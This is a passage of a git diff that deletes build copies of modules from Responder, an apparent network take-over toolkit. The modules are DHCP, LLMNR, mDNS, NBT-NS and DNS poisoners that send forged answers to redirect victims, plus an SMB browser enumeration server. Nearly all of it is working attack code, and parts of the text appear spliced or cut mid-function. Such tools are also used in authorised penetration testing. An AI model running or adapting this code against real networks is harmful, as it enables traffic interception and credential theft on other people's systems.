OrderedDict -from Responder.utils import * - -def color(txt, code = 1, modifier = 0): - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) - -#Python version -if (sys.version_info > (3, 0)): - PY2OR3 = "PY3" -else: - PY2OR3 = "PY2" - -def StructWithLenPython2or3(endian,data): - #Python2... - if PY2OR3 == "PY2": - return struct.pack(endian, data) - #Python3... - else: - return struct.pack(endian, data).decode('latin-1') - -def NetworkSendBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return bytes(str(data), 'latin-1') - -def NetworkRecvBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return str(data.decode('latin-1')) - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) - -config = configparser.ConfigParser() -config.read(os.path.join(BASEDIR,'Responder.conf')) -RespondTo = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f] -DontRespondTo = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f] -Interface = settings.Config.Interface -Responder_IP = RespondWithIP() -ROUTERIP = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present. -NETMASK = "255.255.255.0" -DNSIP = "0.0.0.0" -DNSIP2 = "0.0.0.0" -DNSNAME = "local" -WPADSRV = "http://"+Responder_IP+"/wpad.dat" -Respond_To_Requests = True -DHCPClient = [] - -def GetMacAddress(Interface): - try: - mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr'] - return binascii.unhexlify(mac.replace(':', '')).decode('latin-1') - except: - mac = "00:00:00:00:00:00" - return binascii.unhexlify(mac.replace(':', '')).decode('latin-1') - -##### IP Header ##### -class IPHead(Packet): - fields = OrderedDict([ - ("Version", "\x45"), - ("DiffServices", "\x00"), - ("TotalLen", "\x00\x00"), - ("Ident", "\x00\x00"), - ("Flags", "\x00\x00"), - ("TTL", "\x40"), - ("Protocol", "\x11"), - ("Checksum", "\x00\x00"), - ("SrcIP", ""), - ("DstIP", ""), - ]) - -class UDP(Packet): - fields = OrderedDict([ - ("SrcPort", "\x00\x43"), - ("DstPort", "\x00\x44"), - ("Len", "\x00\x00"), - ("Checksum", "\x00\x00"), - ("Data", "\x00\x00"), - ]) - - def calculate(self): - self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8) - -class DHCPDiscover(Packet): - fields = OrderedDict([ - ("MessType", "\x01"), - ("HdwType", "\x01"), - ("HdwLen", "\x06"), - ("Hops", "\x00"), - ("Tid", os.urandom(4).decode('latin-1')), - ("ElapsedSec", "\x00\x01"), - ("BootpFlags", "\x80\x00"), - ("ActualClientIP", "\x00\x00\x00\x00"), - ("GiveClientIP", "\x00\x00\x00\x00"), - ("NextServerIP", "\x00\x00\x00\x00"), - ("RelayAgentIP", "\x00\x00\x00\x00"), - ("ClientMac", os.urandom(6).decode('latin-1')),#Needs to be random. - ("ClientMacPadding", "\x00" *10), - ("ServerHostname", "\x00" * 64), - ("BootFileName", "\x00" * 128), - ("MagicCookie", "\x63\x82\x53\x63"), - ("DHCPCode", "\x35"), #DHCP Message - ("DHCPCodeLen", "\x01"), - ("DHCPOpCode", "\x01"), #Msgtype(Discover) - ("Op55", "\x37"), - ("Op55Len", "\x0b"), - ("Op55Str", "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info. - ("Op12", "\x0c"), - ("Op12Len", "\x09"), - ("Op12Str", settings.Config.DHCPHostname),#random str. - ("Op255", "\xff"), - ("Padding", "\x00"), - ]) - - def calculate(self): - self.fields["ClientMac"] = GetMacAddress(Interface) - -class DHCPACK(Packet): - fields = OrderedDict([ - ("MessType", "\x02"), - ("HdwType", "\x01"), - ("HdwLen", "\x06"), - ("Hops", "\x00"), - ("Tid", "\x11\x22\x33\x44"), - ("ElapsedSec", "\x00\x00"), - ("BootpFlags", "\x00\x00"), - ("ActualClientIP", "\x00\x00\x00\x00"), - ("GiveClientIP", "\x00\x00\x00\x00"), - ("NextServerIP", "\x00\x00\x00\x00"), - ("RelayAgentIP", "\x00\x00\x00\x00"), - ("ClientMac", "\xff\xff\xff\xff\xff\xff"), - ("ClientMacPadding", "\x00" *10), - ("ServerHostname", "\x00" * 64), - ("BootFileName", "\x00" * 128), - ("MagicCookie", "\x63\x82\x53\x63"), - ("DHCPCode", "\x35"), #DHCP Message - ("DHCPCodeLen", "\x01"), - ("DHCPOpCode", "\x05"), #Msgtype(ACK) - ("Op54", "\x36"), - ("Op54Len", "\x04"), - ("Op54Str", ""), #DHCP Server - ("Op51", "\x33"), - ("Op51Len", "\x04"), - ("Op51Str", "\x00\x00\x00\x0a"), #Lease time - ("Op1", "\x01"), - ("Op1Len", "\x04"), - ("Op1Str", ""), #Netmask - ("Op15", "\x0f"), - ("Op15Len", "\x0e"), - ("Op15Str", ""), #DNS Name - ("Op3", "\x03"), - ("Op3Len", "\x04"), - ("Op3Str", ""), #Router - ("Op6", "\x06"), - ("Op6Len", "\x08"), - ("Op6Str", ""), #DNS Servers - ("Op252", ""), - ("Op252Len", ""), - ("Op252Str", ""), #Wpad Server - ("Op255", "\xff"), - ("Padding", "\x00"), - ]) - - def calculate(self, DHCP_DNS): - self.fields["Op54Str"] = socket.inet_aton(ROUTERIP).decode('latin-1') - self.fields["Op1Str"] = socket.inet_aton(NETMASK).decode('latin-1') - self.fields["Op3Str"] = socket.inet_aton(ROUTERIP).decode('latin-1') - self.fields["Op6Str"] = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1') - self.fields["Op15Str"] = DNSNAME - if DHCP_DNS: - self.fields["Op6Str"] = socket.inet_aton(RespondWithIP()).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1') - else: - self.fields["Op252"] = "\xfc" - self.fields["Op252Str"] = WPADSRV - self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"]))) - - self.fields["Op51Str"] = StructWithLenPython2or3('>L', random.randrange(10, 20)) - self.fields["Op15Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"]))) - -def RespondToThisIP(ClientIp): - if ClientIp.startswith('127.0.0.'): - return False - elif RespondTo and ClientIp not in RespondTo: - return False - elif ClientIp in RespondTo or RespondTo == []: - if ClientIp not in DontRespondTo: - return True - return False - -def ParseSrcDSTAddr(data): - SrcIP = socket.inet_ntoa(data[0][26:30]) - DstIP = socket.inet_ntoa(data[0][30:34]) - SrcPort = struct.unpack('>H',data[0][34:36])[0] - DstPort = struct.unpack('>H',data[0][36:38])[0] - return SrcIP, SrcPort, DstIP, DstPort - -def FindIP(data): - data = data.decode('latin-1') - IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data)) - return ''.join(IP[0:4]).encode('latin-1') - -def ParseDHCPCode(data, ClientIP,DHCP_DNS): - global DHCPClient - global ROUTERIP - PTid = data[4:8] - Seconds = data[8:10] - CurrentIP = socket.inet_ntoa(data[12:16]) - RequestedIP = socket.inet_ntoa(data[16:20]) - MacAddr = data[28:34] - MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper() - OpCode = data[242:243] - RequestIP = data[245:249] - - if DHCPClient.count(MacAddrStr) >= 4: - return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr - - if OpCode == b"\x02" and Respond_To_Requests: # DHCP Offer - ROUTERIP = ClientIP - return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP) - - elif OpCode == b"\x03" and Respond_To_Requests: # DHCP Request - IP = FindIP(data) - if IP: - IPConv = socket.inet_ntoa(IP) - if RespondToThisIP(IPConv): - IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1')) - Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1')) - Packet.calculate(DHCP_DNS) - Buffer = UDP(Data = Packet) - Buffer.calculate() - SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68)) - DHCPClient.append(MacAddrStr) - SaveDHCPToDb({ - 'MAC': MacAddrStr, - 'IP': CurrentIP, - 'RequestedIP': IPConv, - }) - return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr) - - # DHCP Inform - elif OpCode == b"\x08": - IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=socket.inet_aton(CurrentIP).decode('latin-1')) - Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), ActualClientIP=socket.inet_aton(CurrentIP).decode('latin-1'), - GiveClientIP=socket.inet_aton("0.0.0.0").decode('latin-1'), - NextServerIP=socket.inet_aton("0.0.0.0").decode('latin-1'), - RelayAgentIP=socket.inet_aton("0.0.0.0").decode('latin-1'), - ElapsedSec=Seconds.decode('latin-1')) - Packet.calculate(DHCP_DNS) - Buffer = UDP(Data = Packet) - Buffer.calculate() - SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68)) - DHCPClient.append(MacAddrStr) - SaveDHCPToDb({ - 'MAC': MacAddrStr, - 'IP': CurrentIP, - 'RequestedIP': RequestedIP, - }) - return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr) - - elif OpCode == b"\x01" and Respond_To_Requests: # DHCP Discover - IP = FindIP(data) - if IP: - IPConv = socket.inet_ntoa(IP) - if RespondToThisIP(IPConv): - IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1')) - Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1')) - Packet.calculate(DHCP_DNS) - Buffer = UDP(Data = Packet) - Buffer.calculate() - SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0)) - DHCPClient.append(MacAddrStr) - SaveDHCPToDb({ - 'MAC': MacAddrStr, - 'IP': CurrentIP, - 'RequestedIP': IPConv, - }) - return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr) - -def SendDiscover(): - s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) - s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) - IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1')) - Packet = DHCPDiscover() - Packet.calculate() - Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet) - Buffer.calculate() - s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67)) - -def SendDHCP(packet,Host): - s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) - s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) - s.sendto(NetworkSendBufferPython2or3(packet), Host) - -def DHCP(DHCP_DNS): - s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) - s.bind((Interface, 0x0800)) - SendDiscover() - while True: - data = s.recvfrom(65535) - if data[0][23:24] == b"\x11":# is udp? - SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data) - if SrcPort == 67 or DstPort == 67: - ClientIP = socket.inet_ntoa(data[0][26:30]) - ret = ParseDHCPCode(data[0][42:], ClientIP,DHCP_DNS) - if ret and not settings.Config.Quiet_Mode: - print(text("[*] [DHCP] %s" % ret)) diff --git a/build/lib/Responder/poisoners/LLMNR.py b/build/lib/Responder/poisoners/LLMNR.py deleted file mode 100644 index 4795a87..0000000 --- a/build/lib/Responder/poisoners/LLMNR.py +++ /dev/null @@ -1,115 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from Responder.packets import LLMNR_Ans, LLMNR6_Ans -from Responder.utils import * - -if (sys.version_info > (3, 0)): - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - -#Should we answer to those AAAA? -Have_IPv6 = settings.Config.IPv6 - -def Parse_LLMNR_Name(data): - import codecs - NameLen = data[12] - if (sys.version_info > (3, 0)): - return data[13:13+NameLen] - else: - NameLen2 = int(codecs.encode(NameLen, 'hex'), 16) - return data[13:13+int(NameLen2)] - -def IsICMPRedirectPlausible(IP): - dnsip = [] - with open('/etc/resolv.conf', 'r') as file: - for line in file: - ip = line.split() - if len(ip) < 2: - continue - elif ip[0] == 'nameserver': - dnsip.extend(ip[1:]) - for x in dnsip: - if x != "127.0.0.1" and IsIPv6IP(x) is False and IsOnTheSameSubnet(x,IP) is False: #Temp fix to ignore IPv6 DNS addresses - print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)) - print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)) - print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)) - -if settings.Config.AnalyzeMode: - IsICMPRedirectPlausible(settings.Config.Bind_To) - - -class LLMNR(BaseRequestHandler): # LLMNR Server class - def handle(self): - try: - data, soc = self.request - Name = Parse_LLMNR_Name(data).decode("latin-1") - LLMNRType = Parse_IPV6_Addr(data) - - # Break out if we don't want to respond to this host - if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True: - return None - #IPv4 - if data[2:4] == b'\x00\x00' and LLMNRType: - if settings.Config.AnalyzeMode: - LineHeader = "[Analyze mode: LLMNR]" - print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1)) - SavePoisonersToDb({ - 'Poisoner': 'LLMNR', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '1', - }) - - elif LLMNRType == True: # Poisoning Mode - #Default: - if settings.Config.TTL == None: - Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name) - else: - Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL) - Buffer1.calculate() - soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) - if not settings.Config.Quiet_Mode: - LineHeader = "[*] [LLMNR]" - print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1)) - SavePoisonersToDb({ - 'Poisoner': 'LLMNR', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '0', - }) - - elif LLMNRType == 'IPv6' and Have_IPv6: - #Default: - if settings.Config.TTL == None: - Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name) - else: - Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL) - Buffer1.calculate() - soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) - if not settings.Config.Quiet_Mode: - LineHeader = "[*] [LLMNR]" - print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1)) - SavePoisonersToDb({ - 'Poisoner': 'LLMNR6', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '0', - }) - - except: - pass diff --git a/build/lib/Responder/poisoners/MDNS.py b/build/lib/Responder/poisoners/MDNS.py deleted file mode 100644 index 7311201..0000000 --- a/build/lib/Responder/poisoners/MDNS.py +++ /dev/null @@ -1,110 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import struct -import sys -if (sys.version_info > (3, 0)): - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler -from Responder.packets import MDNS_Ans, MDNS6_Ans -from Responder.utils import * - -#Should we answer to those AAAA? -Have_IPv6 = settings.Config.IPv6 - -def Parse_MDNS_Name(data): - try: - if (sys.version_info > (3, 0)): - data = data[12:] - NameLen = data[0] - Name = data[1:1+NameLen] - NameLen_ = data[1+NameLen] - Name_ = data[1+NameLen:1+NameLen+NameLen_+1] - FinalName = Name+b'.'+Name_ - return FinalName.decode("latin-1").replace("\x05","") - else: - data = NetworkRecvBufferPython2or3(data[12:]) - NameLen = struct.unpack('>B',data[0])[0] - Name = data[1:1+NameLen] - NameLen_ = struct.unpack('>B',data[1+NameLen])[0] - Name_ = data[1+NameLen:1+NameLen+NameLen_+1] - return Name+'.'+Name_.replace("\x05","") - - except IndexError: - return None - - -def Poisoned_MDNS_Name(data): - data = NetworkRecvBufferPython2or3(data[12:]) - return data[:len(data)-5] - -class MDNS(BaseRequestHandler): - def handle(self): - try: - data, soc = self.request - Request_Name = Parse_MDNS_Name(data) - MDNSType = Parse_IPV6_Addr(data) - # Break out if we don't want to respond to this host - - if (not Request_Name) or (RespondToThisHost(self.client_address[0].replace("::ffff:",""), Request_Name) is not True): - return None - - if settings.Config.AnalyzeMode: # Analyze Mode - print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Request_Name, 3)))) - SavePoisonersToDb({ - 'Poisoner': 'MDNS', - 'SentToIp': self.client_address[0], - 'ForName': Request_Name, - 'AnalyzeMode': '1', - }) - elif MDNSType == True: # Poisoning Mode - Poisoned_Name = Poisoned_MDNS_Name(data) - #Use default: - if settings.Config.TTL == None: - Buffer = MDNS_Ans(AnswerName = Poisoned_Name) - else: - Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL) - Buffer.calculate() - soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address) - if not settings.Config.Quiet_Mode: - print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1)) - SavePoisonersToDb({ - 'Poisoner': 'MDNS', - 'SentToIp': self.client_address[0], - 'ForName': Request_Name, - 'AnalyzeMode': '0', - }) - - elif MDNSType == 'IPv6' and Have_IPv6: # Poisoning Mode - Poisoned_Name = Poisoned_MDNS_Name(data) - #Use default: - if settings.Config.TTL == None: - Buffer = MDNS6_Ans(AnswerName = Poisoned_Name) - else: - Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL) - Buffer.calculate() - soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address) - if not settings.Config.Quiet_Mode: - print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1)) - SavePoisonersToDb({ - 'Poisoner': 'MDNS6', - 'SentToIp': self.client_address[0], - 'ForName': Request_Name, - 'AnalyzeMode': '0', - }) - except: - raise diff --git a/build/lib/Responder/poisoners/NBTNS.py b/build/lib/Responder/poisoners/NBTNS.py deleted file mode 100644 index 324ecaa..0000000 --- a/build/lib/Responder/poisoners/NBTNS.py +++ /dev/null @@ -1,64 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import sys -from Responder.packets import NBT_Ans -from Responder.utils import * - -if (sys.version_info > (3, 0)): - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - -# NBT_NS Server class. -class NBTNS(BaseRequestHandler): - - def handle(self): - try: - data, socket = self.request - Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45])) - # Break out if we don't want to respond to this host - if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True: - return None - - if data[2:4] == b'\x01\x10': - if settings.Config.AnalyzeMode: # Analyze Mode - print(text('[Analyze mode: NBT-NS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Name, 3)))) - SavePoisonersToDb({ - 'Poisoner': 'NBT-NS', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '1', - }) - else: # Poisoning Mode - if settings.Config.TTL == None: - Buffer1 = NBT_Ans() - else: - Buffer1 = NBT_Ans(TTL=settings.Config.TTL) - Buffer1.calculate(data) - socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) - if not settings.Config.Quiet_Mode: - LineHeader = "[*] [NBT-NS]" - print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1)) - SavePoisonersToDb({ - 'Poisoner': 'NBT-NS', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '0', - }) - except: - raise - diff --git a/build/lib/Responder/poisoners/__init__.py b/build/lib/Responder/poisoners/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/build/lib/Responder/servers/Browser.py b/build/lib/Responder/servers/Browser.py deleted file mode 100644 index 160f91b..0000000 --- a/build/lib/Responder/servers/Browser.py +++ /dev/null @@ -1,204 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from Responder.utils import * -from Responder.packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler -import struct - - -def WorkstationFingerPrint(data): - return { - b"\x04\x00" :"Windows 95", - b"\x04\x0A" :"Windows 98", - b"\x04\x5A" :"Windows ME", - b"\x05\x00" :"Windows 2000", - b"\x05\x01" :"Windows XP", - b"\x05\x02" :"Windows XP(64-Bit)/Windows 2003", - b"\x06\x00" :"Windows Vista/Server 2008", - b"\x06\x01" :"Windows 7/Server 2008R2", - b"\x06\x02" :"Windows 8/Server 2012", - b"\x06\x03" :"Windows 8.1/Server 2012R2", - b"\x0A\x00" :"Windows 10/Server 2016", - }.get(data, 'Unknown') - - -def RequestType(data): - return { - b"\x01": 'Host Announcement', - b"\x02": 'Request Announcement', - b"\x08": 'Browser Election', - b"\x09": 'Get Backup List Request', - b"\x0a": 'Get Backup List Response', - b"\x0b": 'Become Backup Browser', - b"\x0c": 'Domain/Workgroup Announcement', - b"\x0d": 'Master Announcement', - b"\x0e": 'Reset Browser State Announcement', - b"\x0f": 'Local Master Announcement', - }.get(data, 'Unknown') - - -def PrintServerName(data, entries): - if entries <= 0: - return None - entrieslen = 26 * entries - chunks, chunk_size = len(data[:entrieslen]), entrieslen//entries - ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)] - - l = [] - for x in ServerName: - fingerprint = WorkstationFingerPrint(x[16:18]) - name = x[:16].strip(b'\x00').decode('latin-1') - l.append('%s (%s)' % (name, fingerprint)) - return l - - -def ParsePacket(Payload): - PayloadOffset = struct.unpack('i', str(Packet))+str(Packet)#struct.pack(">i", len(''.join(Packet))) + Packet - - s.send(NetworkSendBufferPython2or3(Buffer)) - data = s.recv(1024) - - # Session Setup AndX Request, Anonymous. - if data[8:10] == b'\x72\x00': - Header = SMBHeader(cmd="\x73",mid="\x02\x00") - Body = SMBSessionData() - Body.calculate() - - Packet = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - - s.send(NetworkSendBufferPython2or3(Buffer)) - data = s.recv(1024) - - # Tree Connect IPC$. - if data[8:10] == b'\x73\x00': - Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34].decode('latin-1'),mid="\x03\x00") - Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$") - Body.calculate() - - Packet = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - - s.send(NetworkSendBufferPython2or3(Buffer)) - data = s.recv(1024) - - # Rap ServerEnum. - if data[8:10] == b'\x75\x00': - Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x04\x00") - Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain)) - Body.calculate() - - Packet = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - - s.send(NetworkSendBufferPython2or3(Buffer)) - data = s.recv(64736) - - # Rap ServerEnum, Get answer and return what we're looking for. - if data[8:10] == b'\x25\x00': - s.close() - return ParsePacket(data) - except: - pass - -def BecomeBackup(data,Client): - try: - DataOffset = struct.unpack('. -from Responder.utils import * -from Responder.packets import DNS_Ans, DNS_SRV_Ans, DNS6_Ans, DNS_AnsOPT -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - -#Should we answer to those AAAA? -Have_IPv6 = settings.Config.IPv6 - -def ParseDNSType(data): - QueryTypeClass = data[len(data)-4:] - OPT = data[len(data)-22:len(data)-20] - if OPT == "\x00\x29": - return "OPTIPv4" - # If Type A, Class IN, then answer. - elif QueryTypeClass == "\x00\x01\x00\x01": - return "A" - elif QueryTypeClass == "\x00\x21\x00\x01": - return "SRV" - elif QueryTypeClass == "\x00\x1c\x00\x01": - return "IPv6" - - - -class DNS(BaseRequestHandler): - def handle(self): - # Ditch it if we don't want to respond to this host - if RespondToThisIP(self.client_address[0]) is not True: - return None - - try: - data, soc = self.request - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A": - buff = DNS_Ans() - buff.calculate(NetworkRecvBufferPython2or3(data)) - soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4": - buff = DNS_AnsOPT() - buff.calculate(NetworkRecvBufferPython2or3(data)) - soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV": - buff = DNS_SRV_Ans() - buff.calculate(NetworkRecvBufferPython2or3(data)) - soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6" and Have_IPv6: - buff = DNS6_Ans() - buff.calculate(NetworkRecvBufferPython2or3(data)) - soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] AAAA Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6" and Have_IPv6: - buff = DNS6_Ans() - buff.calculate(NetworkRecvBufferPython2or3(data)) - 